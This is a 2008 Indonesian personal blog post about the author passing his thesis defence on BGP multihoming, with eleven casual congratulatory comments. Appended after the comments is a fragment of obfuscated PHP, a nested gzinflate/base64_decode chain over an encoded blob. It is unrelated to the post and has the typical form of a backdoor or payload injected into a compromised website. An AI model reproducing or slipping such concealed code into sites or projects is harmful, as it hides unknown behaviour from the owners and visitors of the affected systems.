Delicious

Archives

Categories

Next Round…

  ozzie / 12/08/2008


12-08-80 (kayak password orang yang ulang taon 8-} )..

Finally.. #:-s Alhamdulillah [-o<[-o<[-o< Sebagai mahasiswa Bego:-s. Usaha gw selama ini bisa berakhir 8-} .. Skripsi gw dah lulus sidang <:-p.. dengan judul “Implementasi Multihoming dengan BGP:">:"> walaupun nunggu dari pagi.. mana udah keren banget pake almamater segala 8-} tapi kebagian urutan nomer sidang 10 #:-s.. makasih buat para dosen pembimbing dan penguji ternyata sangat Mudah.. :">:">.. tinggal revisi ama tutup study \:d/\:d/\:d/ (kalo kata om Bryan Adams – Best day of my life 8-})..

Saatnya Celebration.. tapi 8-|.. masih berkabung menghadapi si-Anjing yang gak bisa di percaya.. :-<

Siap-siap menghadapi dan mengacak-acak musuh baru di dunia nyata :D:D.. (Kalo maren kan di dunia maya ;));)) ).. waktunya Ranger Biru beraksi <:-p<:-p

So… Don’t F*ck with Me… Let’s See.. What Next? :>:>


« »


11 Responses to “Next Round…”

  1. TOMMY (ex kapak merah) Says:

    NONOK GW DITINGGALIN…. :((

  2. aryoi Says:

    Yoooooiiiiiii si om dahh bebasss….slamat om…hheheee btww tentang kapasitas bandwidth masing2 link kgak ada yg ngehh om…slamat Om…mudah2an cukup menghibur buat ngobatinn kekesalannnyaa..hheheeee …CONGRATULATION….!!!

  3. ozzie Says:

    @ tommy..

    masih aja lu maen nonok 8-}8-} .. dah bab berapa lu? ;));))

    @ aryoi
    hehehe :">.. ho oh.. gw dah limit di interface nyah tapi gak ditanya ;));)).. gw gak kesel nunggu sidang ;);).. tapi kesel ama Anjing itu :))..

  4. Nanang Says:

    Wah selamat ya… Akhirnya lulus juga… :D , trus setelah lulus kapan rencana nikahnya :D

  5. begenkagapakenich Says:

    akhirnye lulus juga!!! =P~ selamet ye om :D semoga makin sukses, makin sakti, makin keren :p, ditunggu celebrationnye om ;))

  6. iroel Says:

    ok bro …. hanya ngucapin selamet ma lo…usaha dari pagi gk sia-sia…
    akhirnya lulus juga…dengan nilai yang bagus juga

  7. KieN Says:

    huehehe… selamet bro … moga jd sarjana yg mabrur …haha ^^v
    giliran gw nich ….ANJRIT!! …deg..deg…ser…huhuhu

  8. yudhi Says:

    kapan syukuran jack’d ?
    eh, mansiong jg gpp.

  9. a13 Says:

    selamat yah… akhirnya s1 ditangan juga.. jangan kek ikien.. ” s1 i’m comiiiinggg..” tapi nda ‘coming2′… ada yang belom selesai katanya… ;)) ..

    btw … u look so cute with that … :) suksess ya..

  10. pahlawan bertopng Says:

    bos,slamet dah…udah lulus jadi anggota kapak merah, tapi kriteria muka blom lulus2 nih…!

  11. KieN Says:

    weks…kupret lo chie,,huhu
    kan sidangnya juga baru ntar,,,hehe


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>